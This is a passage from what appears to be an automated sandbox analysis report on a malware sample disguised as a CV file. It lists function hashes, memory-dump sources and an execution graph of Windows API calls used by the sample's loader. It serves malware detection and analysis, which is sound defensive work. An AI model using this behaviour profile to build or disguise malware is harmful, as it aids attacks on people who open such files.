                                    • Opcode ID: 09788ab1f11420fda8fa85971afbd13537152c94b213d0971f6aa4478f132846
                                    • Instruction ID: 6795d38509c7c9d7a1d8216c83d715659ed44681950cbb1d793feaf65773bdc1
                                    • Opcode Fuzzy Hash: 09788ab1f11420fda8fa85971afbd13537152c94b213d0971f6aa4478f132846
                                    • Instruction Fuzzy Hash: 2A21F275604345DFDB14DF14D9C4B16BB65EB88314F24C6ADEC094F296C336D846CA62
                                    Function 02B5D367 Relevance: .1, Instructions: 53COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203463906.0000000002B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B5D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2b5d000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                    • Instruction ID: fec4369f54fa7c3453e7a45267c84980d2093e4167b7cdb1dd7f30aa38879aff
                                    • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                    • Instruction Fuzzy Hash: 08118E75504280DFCB05CF14D5C4B15BB61FB84318F28C6ADDC494F656C33AE44ACB51
                                    Function 02B5D1AF Relevance: .1, Instructions: 53COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203463906.0000000002B5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B5D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2b5d000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                    • Instruction ID: f1c4f5579d13855beed4befcf7177580bd1df959ba6d3100b5e4d5a3d82ea55d
                                    • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                    • Instruction Fuzzy Hash: EC1179756042809FCB05CF14D5C4B15BBA2FB84328F24C6A9DC894F696C33AD44ACBA1

                                    Non-executed Functions

                                    Function 0751CA69 Relevance: .3, Instructions: 321COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f3e80f371746ddc9499153d54d05ea27e427b14f71cd275f4c8aa689d24aff1d
                                    • Instruction ID: 23d59e62beea6fde0bc397167103b350e7a2b2daa6c92223ace376d1847f97a1
                                    • Opcode Fuzzy Hash: f3e80f371746ddc9499153d54d05ea27e427b14f71cd275f4c8aa689d24aff1d
                                    • Instruction Fuzzy Hash: 40E117B4E002198FDB14DFA8C580AAEFBB2FF89305F24816AD415AB355D731AD41CFA1
                                    Function 05E42B20 Relevance: .3, Instructions: 315COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f95d03f457182fbe1030fefcabb1a5cb7fe197cb9b0fc82a1ff8999107ac9571
                                    • Instruction ID: 976584bf6f668aa90260b4fe96842e760bfab5c4e36c3163610f83e051defdb1
                                    • Opcode Fuzzy Hash: f95d03f457182fbe1030fefcabb1a5cb7fe197cb9b0fc82a1ff8999107ac9571
                                    • Instruction Fuzzy Hash: 6F1287B2622B85DBEB10CF65F84E18A7FB2BF45314B504209E2612F6E5DFB8154ACF44
                                    Function 0751D2E8 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d6c43154ca175ffacb7f0908a5542d317d1405ed91896621df9f5ec0f2943adb
                                    • Instruction ID: e0aa6b708dd922036232bc9b8776bc0ec7a05d832319474cbb1a25c6cf1d1455
                                    • Opcode Fuzzy Hash: d6c43154ca175ffacb7f0908a5542d317d1405ed91896621df9f5ec0f2943adb
                                    • Instruction Fuzzy Hash: 22E118B4E002198FDB14DFA8C580AAEFBB2FF89305F248569D415AB355D730AD42CFA1
                                    Function 0751EE28 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9b10ca552486489a51d759337abde1c5d27dfb9dc6a3253c378ebd7afc6cbbe5
                                    • Instruction ID: c0831fd894ca78a21499788ecb2724e0e8794b106b70022693159a998d949ad9
                                    • Opcode Fuzzy Hash: 9b10ca552486489a51d759337abde1c5d27dfb9dc6a3253c378ebd7afc6cbbe5
                                    • Instruction Fuzzy Hash: B7E1FCB4E002198FDB14DFA8C580AAEFBB2FF49305F248559D815AB395D731AD41CFA1
                                    Function 0751CEB0 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3f568bcbabcbc1c7b6420626b312989c662dec9848406b4ae95b235ce9d0682b
                                    • Instruction ID: f2211c2c2ad5d61192f9eab1226328a6c7385d876c6acdbc73606027ce44f89d
                                    • Opcode Fuzzy Hash: 3f568bcbabcbc1c7b6420626b312989c662dec9848406b4ae95b235ce9d0682b
                                    • Instruction Fuzzy Hash: 1FE118B4E002198FDB14DFA8C580AAEFBB2FF89305F248569D415AB355D731AD42CFA1
                                    Function 0751E9F0 Relevance: .3, Instructions: 312COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2d154b03eda1043b81da857f9e3f0bde44e950af49546a573f8a6d0893c3c70d
                                    • Instruction ID: 2f3e8bc65e17aa7d1f2fc9f5ff6016e1ea9da9712d2118dfcac176970b613325
                                    • Opcode Fuzzy Hash: 2d154b03eda1043b81da857f9e3f0bde44e950af49546a573f8a6d0893c3c70d
                                    • Instruction Fuzzy Hash: 8FE128B4E002198FDB14DFA8C581AAEFBB2FF89305F248569D815AB355D730AD42CF61
                                    Function 075149F3 Relevance: .3, Instructions: 269COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 65d7704c5262eab13821169ea147f17afdbb6b9b20033587edf44ae14bcaf585
                                    • Instruction ID: 4869f5821bc4e61dc62c9637b75e34fd9ce12d1f038b42a6b068c58732db6f26
                                    • Opcode Fuzzy Hash: 65d7704c5262eab13821169ea147f17afdbb6b9b20033587edf44ae14bcaf585
                                    • Instruction Fuzzy Hash: E5D1D835D1075A8ACB11EFA4D990A99F7B1FF95300F20D79AD0093B614EB706AC9CF81
                                    Function 07514A00 Relevance: .3, Instructions: 264COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fc3cb5fa8ce2c1b3397da09f7418942fad82e81b5ecc19a644e54112b330cc25
                                    • Instruction ID: 758f7a10273b356de92fea308d2c415bcd913382aed03b2303db21b0ccc2d8e0
                                    • Opcode Fuzzy Hash: fc3cb5fa8ce2c1b3397da09f7418942fad82e81b5ecc19a644e54112b330cc25
                                    • Instruction Fuzzy Hash: D1D1E835D1075A8ACB11EFA4D990A99F7B1FF95300F20D79AD0093B614EB70AAC9CF81
                                    Function 05E42160 Relevance: .3, Instructions: 260COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8c7081080b00a02b28ab3c3ff630f2c96c39662bece12a4549c45e01f9d38c56
                                    • Instruction ID: 1b2fb9dd689e00a6405a747f7689231d83eb6885b293d8f48d009552e34186fe
                                    • Opcode Fuzzy Hash: 8c7081080b00a02b28ab3c3ff630f2c96c39662bece12a4549c45e01f9d38c56
                                    • Instruction Fuzzy Hash: 5FA18F36E00219CFCF09DFB4E84499EBBB2FF85304B15916AE906AB251DB31E956CF40
                                    Function 05E42B11 Relevance: .2, Instructions: 221COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7ea7588ac7e48db10545abdc598ce646932598b2db8596b5e2ba12ad5c6b98d5
                                    • Instruction ID: 2b383bf96b602189b2213f0148cf178766638be742e0a6d2ad879c7a39d56e42
                                    • Opcode Fuzzy Hash: 7ea7588ac7e48db10545abdc598ce646932598b2db8596b5e2ba12ad5c6b98d5
                                    • Instruction Fuzzy Hash: 52C1EBB2621B859BEB10CF65F84E28A7FB2BF85324F514209F2612B2D5DFB4154ACF44
                                    Function 0751EE1B Relevance: .1, Instructions: 135COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3bc008ddf3c5f0d2aad5abffc06e83204781cdf00c7d39c6622bb7db5fb3b92f
                                    • Instruction ID: 034cc9983551e9e64bb6a1ddc43b95298521e6573fa1e8a55bedf5b05c934ae9
                                    • Opcode Fuzzy Hash: 3bc008ddf3c5f0d2aad5abffc06e83204781cdf00c7d39c6622bb7db5fb3b92f
                                    • Instruction Fuzzy Hash: 625119B5E002198FDB14CFA9C5815AEFBF2BF89305F24856AD818AB355C7309D42CFA1
                                    Function 0751CEA1 Relevance: .1, Instructions: 134COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b908ec1f7e58d50b0092f871db002110825b6b965c377c39122ec0d9c930ee3c
                                    • Instruction ID: 422203fa9ffc0e2d7fb5aa351f73a2c81fde254f263da9ad49d967b47c7e9f54
                                    • Opcode Fuzzy Hash: b908ec1f7e58d50b0092f871db002110825b6b965c377c39122ec0d9c930ee3c
                                    • Instruction Fuzzy Hash: 245138B5E002198FDB14CFA9C5809AEFBB2FF89305F24856AD418AB355D7319D42CFA1
                                    Function 02CD7D2B Relevance: .1, Instructions: 102COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 59c04f07e1667c327b585112d3111e27d173d669872551141934d2bdc053c19c
                                    • Instruction ID: b477435363bc9e981075e19132e768f27e7da3d0ba67a78fe202d119cc1bc5ea
                                    • Opcode Fuzzy Hash: 59c04f07e1667c327b585112d3111e27d173d669872551141934d2bdc053c19c
                                    • Instruction Fuzzy Hash: 364115B8E4110A8FCF14CFA9E191AADF7F2EF88300B51E629D016EB645DA30A945CB50
                                    Function 07891317 Relevance: .0, Instructions: 24COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1209871523.0000000007890000.00000040.00000800.00020000.00000000.sdmp, Offset: 07890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7890000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 584eaad9aa963c82c7e2da473370d0fab036482a01b49655c60a84d0b3eca738
                                    • Instruction ID: 83283d807ef75df575bc4ba5846ba92d5d025c2f124de24f453aac32994ba36b
                                    • Opcode Fuzzy Hash: 584eaad9aa963c82c7e2da473370d0fab036482a01b49655c60a84d0b3eca738
                                    • Instruction Fuzzy Hash: 10E092B9D1C10DDBCB008F94E4498F8B7B8AB5F32AF0865A6D40EE7262D73059908A54

                                    Execution Graph

                                    Execution Coverage:1.1%
                                    Dynamic/Decrypted Code Coverage:5.2%
                                    Signature Coverage:8.1%
                                    Total number of Nodes:135
                                    Total number of Limit Nodes:11
                                    execution_graph 94536 424503 94538 424512 94536->94538 94537 424559 94544 42d223 94537->94544 94538->94537 94541 42459a 94538->94541 94543 42459f 94538->94543 94542 42d223 RtlFreeHeap 94541->94542 94542->94543 94547 42b6a3 94544->94547 94546 424569 94548 42b6bd 94547->94548 94549 42b6ce RtlFreeHeap 94548->94549 94549->94546 94550 42e303 94551 42e313 94550->94551 94552 42e319 94550->94552 94555 42d303 94552->94555 94554 42e33f 94558 42b653 94555->94558 94557 42d31e 94557->94554 94559 42b670 94558->94559 94560 42b681 RtlAllocateHeap 94559->94560 94560->94557 94667 424173 94668 42418f 94667->94668 94669 4241b7 94668->94669 94670 4241cb 94668->94670 94671 42b353 NtClose 94669->94671 94672 42b353 NtClose 94670->94672 94673 4241c0 94671->94673 94674 4241d4 94672->94674 94677 42d343 RtlAllocateHeap 94674->94677 94676 4241df 94677->94676 94678 42a973 94679 42a98d 94678->94679 94682 1532df0 LdrInitializeThunk 94679->94682 94680 42a9b5 94682->94680 94561 413e23 94562 413e3d 94561->94562 94567 4177f3 94562->94567 94564 413e5b 94565 413ea0 94564->94565 94566 413e8f PostThreadMessageW 94564->94566 94566->94565 94568 417817 94567->94568 94569 417853 LdrLoadDll 94568->94569 94570 41781e 94568->94570 94569->94570 94570->94564 94683 418973 94684 418978 94683->94684 94685 418921 94684->94685 94686 42b353 NtClose 94684->94686 94687 4189ff 94686->94687 94688 41ae13 94689 41ae57 94688->94689 94690 42b353 NtClose 94689->94690 94691 41ae78 94689->94691 94690->94691 94692 41df33 94693 41df59 94692->94693 94697 41e041 94693->94697 94698 42e433 94693->94698 94695 41dfe8 94696 42a9c3 LdrInitializeThunk 94695->94696 94695->94697 94696->94697 94699 42e3a3 94698->94699 94700 42d303 RtlAllocateHeap 94699->94700 94703 42e400 94699->94703 94701 42e3dd 94700->94701 94702 42d223 RtlFreeHeap 94701->94702 94702->94703 94703->94695 94704 1532b60 LdrInitializeThunk 94571 413a07 94572 4139bb 94571->94572 94572->94571 94574 413a37 94572->94574 94576 42b5c3 94572->94576 94577 42b5dd 94576->94577 94580 1532c70 LdrInitializeThunk 94577->94580 94578 4139c2 94580->94578 94581 401a6c 94583 401a39 94581->94583 94582 4019f2 94583->94581 94583->94582 94586 42e7c3 94583->94586 94589 42ce33 94586->94589 94590 42ce56 94589->94590 94601 407323 94590->94601 94592 42ce6c 94600 401ba3 94592->94600 94604 41ac23 94592->94604 94594 42ce8b 94597 42cea0 94594->94597 94619 42b6f3 94594->94619 94615 4273f3 94597->94615 94598 42ceaf 94599 42b6f3 ExitProcess 94598->94599 94599->94600 94622 416523 94601->94622 94603 407330 94603->94592 94605 41ac4f 94604->94605 94640 41ab13 94605->94640 94608 41ac7c 94612 41ac87 94608->94612 94646 42b353 94608->94646 94609 41ac94 94611 42b353 NtClose 94609->94611 94613 41acb0 94609->94613 94614 41aca6 94611->94614 94612->94594 94613->94594 94614->94594 94616 42744d 94615->94616 94617 42745a 94616->94617 94654 418343 94616->94654 94617->94598 94620 42b710 94619->94620 94621 42b721 ExitProcess 94620->94621 94621->94597 94623 416537 94622->94623 94625 416550 94623->94625 94626 42bda3 94623->94626 94625->94603 94628 42bdbb 94626->94628 94627 42bddf 94627->94625 94628->94627 94633 42a9c3 94628->94633 94631 42d223 RtlFreeHeap 94632 42be47 94631->94632 94632->94625 94634 42a9e0 94633->94634 94637 1532c0a 94634->94637 94635 42aa0c 94635->94631 94638 1532c11 94637->94638 94639 1532c1f LdrInitializeThunk 94637->94639 94638->94635 94639->94635 94641 41ab2d 94640->94641 94645 41ac09 94640->94645 94649 42aa63 94641->94649 94644 42b353 NtClose 94644->94645 94645->94608 94645->94609 94647 42b36d 94646->94647 94648 42b37e NtClose 94647->94648 94648->94612 94650 42aa7d 94649->94650 94653 15335c0 LdrInitializeThunk 94650->94653 94651 41abfd 94651->94644 94653->94651 94656 41836d 94654->94656 94655 4187db 94655->94617 94656->94655 94662 413f53 94656->94662 94658 41847a 94658->94655 94659 42d223 RtlFreeHeap 94658->94659 94660 418492 94659->94660 94660->94655 94661 42b6f3 ExitProcess 94660->94661 94661->94655 94664 413f72 94662->94664 94663 414090 94663->94658 94664->94663 94666 4139a3 LdrInitializeThunk 94664->94666 94666->94663

                                    Executed Functions

                                    Function 004177F3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 105 4177f3-41780f 106 417817-41781c 105->106 107 417812 call 42df23 105->107 108 417822-417830 call 42e443 106->108 109 41781e-417821 106->109 107->106 112 417840-417851 call 42c903 108->112 113 417832-41783d call 42e6e3 108->113 118 417853-417867 LdrLoadDll 112->118 119 41786a-41786d 112->119 113->112 118->119
                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417865
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    • Opcode ID: 0a5b46808d07e863b45c642623f8f10eb7d4fdfe879cc680468a100e3a6e7ddd
                                    • Instruction ID: c600fbf14ccdb3b6bbdc0d7a0d34ba2adb134db4c3159965c65cc2899dd20b40
                                    • Opcode Fuzzy Hash: 0a5b46808d07e863b45c642623f8f10eb7d4fdfe879cc680468a100e3a6e7ddd
                                    • Instruction Fuzzy Hash: 2E015EB1E4020DBBDB10EAA1DC46FDEB3B8AB14308F04419AE90897240F634EB44CB95
                                    Function 0042B353 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 130 42b353-42b38c call 4047d3 call 42c403 NtClose
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    • Opcode ID: 72b71f9a6b8d339d6c9fae34c2719ce30272c9944d81a440af5fa0689e489d0b
                                    • Instruction ID: bcf21dc0d3ee2efe2e1afd8d6137da1a1ed99b5e6b7e79da75cbf38aa045c435
                                    • Opcode Fuzzy Hash: 72b71f9a6b8d339d6c9fae34c2719ce30272c9944d81a440af5fa0689e489d0b
                                    • Instruction Fuzzy Hash: 89E08C362042147BD620FA5AEC42FABB76CDFC5718F40402AFA08A7282C774BA1187F5
                                    Function 01532B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 144 1532b60-1532b6c LdrInitializeThunk
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 6716553c75b9675332a65be5b1751a1ed7fa0d853122c2c8a344e176f732c445
                                    • Instruction ID: 7abd6c26aeca4f84cc7d15c94a930a4b7683e83ed4c4a65aeb9e29f810bb3e14
                                    • Opcode Fuzzy Hash: 6716553c75b9675332a65be5b1751a1ed7fa0d853122c2c8a344e176f732c445
                                    • Instruction Fuzzy Hash: 5D90027120240003410571994414616405AA7E0215B59C421E1014990DC5B589916225
                                    Function 01532DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 1253f9e095866d1bea63dba8114fd486d4c0e4531fc849e8178375d585a40ba1
                                    • Instruction ID: 78ac999c06f632d88473396045dbbff633e11e930c292c5eddadabd236447928
                                    • Opcode Fuzzy Hash: 1253f9e095866d1bea63dba8114fd486d4c0e4531fc849e8178375d585a40ba1
                                    • Instruction Fuzzy Hash: B490023120140413D111719945047070059A7D0255F99C812A0424958DD6E68A52A221
                                    Function 01532C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: b24b95f7cc9f14bbbe4682621a1b3800fb20f6ba828d94b454b957eaceda3366
                                    • Instruction ID: 6a7380860f71c200e04d7e2d7e28ef8f4f64b0a32e2b3c5d42c8c20806c9838f
                                    • Opcode Fuzzy Hash: b24b95f7cc9f14bbbe4682621a1b3800fb20f6ba828d94b454b957eaceda3366
                                    • Instruction Fuzzy Hash: BE90023120148803D1107199840474A0055A7D0315F5DC811A4424A58DC6E589917221
                                    Function 015335C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_14c0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 9f7dc2856ee371ea7ef120bcd6bfb1baaa6b1c651388297793aa20b5b3774330
                                    • Instruction ID: e8eff1221dcd7d2881a9ded410edc22ad766255445d6eef6db93c42cd6e87432
                                    • Opcode Fuzzy Hash: 9f7dc2856ee371ea7ef120bcd6bfb1baaa6b1c651388297793aa20b5b3774330
                                    • Instruction Fuzzy Hash: 1690023160550403D100719945147061055A7D0215F69C811A0424968DC7E58A5166A2
                                    Function 00413DE5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82threadwindowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • PostThreadMessageW.USER32(63u1Q-P,00000111,00000000,00000000), ref: 00413E9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID: 63u1Q-P$63u1Q-P
                                    • API String ID: 1836367815-3696516997
                                    • Opcode ID: 42209f6e08167594958a002af2930ea08b3c447309a99e52ade44017a84f3cc8
                                    • Instruction ID: dc5bb3cf260cf2ce4a30bffe97848b1d1553202e73f177380cf41b2dc648cf34
                                    • Opcode Fuzzy Hash: 42209f6e08167594958a002af2930ea08b3c447309a99e52ade44017a84f3cc8
                                    • Instruction Fuzzy Hash: 56213872E0421CBBDB00AE959C81DEFB7BCEF41398F444169F908A7241E3389E0787A1
                                    Function 00413E1B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • PostThreadMessageW.USER32(63u1Q-P,00000111,00000000,00000000), ref: 00413E9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID: 63u1Q-P$63u1Q-P
                                    • API String ID: 1836367815-3696516997
                                    • Opcode ID: c5a0de849d3b6746bb95fce058c211bfb17fc5c983063d3aaf9c519b12c6b9c9
                                    • Instruction ID: 390897bf88a302c986df6cd21dac3b3788329b1b2666582d0a29f904653095b6
                                    • Opcode Fuzzy Hash: c5a0de849d3b6746bb95fce058c211bfb17fc5c983063d3aaf9c519b12c6b9c9
                                    • Instruction Fuzzy Hash: B401A572D0021C7ADB109A919C81DEF7B7CDF41398F048069FA18B7241E6789E068BA5
                                    Function 00413E23 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • PostThreadMessageW.USER32(63u1Q-P,00000111,00000000,00000000), ref: 00413E9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_Curriculum Vitae Catalina Munoz.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID: 63u1Q-P$63u1Q-P
                                    • API String ID: 1836367815-3696516997
                                    • Opcode ID: 0f887f0a3e3920cd4c843b2e04dfde9492f7527f20624846d296453d98ef8ddf
                                    • Instruction ID: f30f37ebf3f4f2424e0093e5e6002f802e6db7b98a2d112933dff9aa7dd937f7
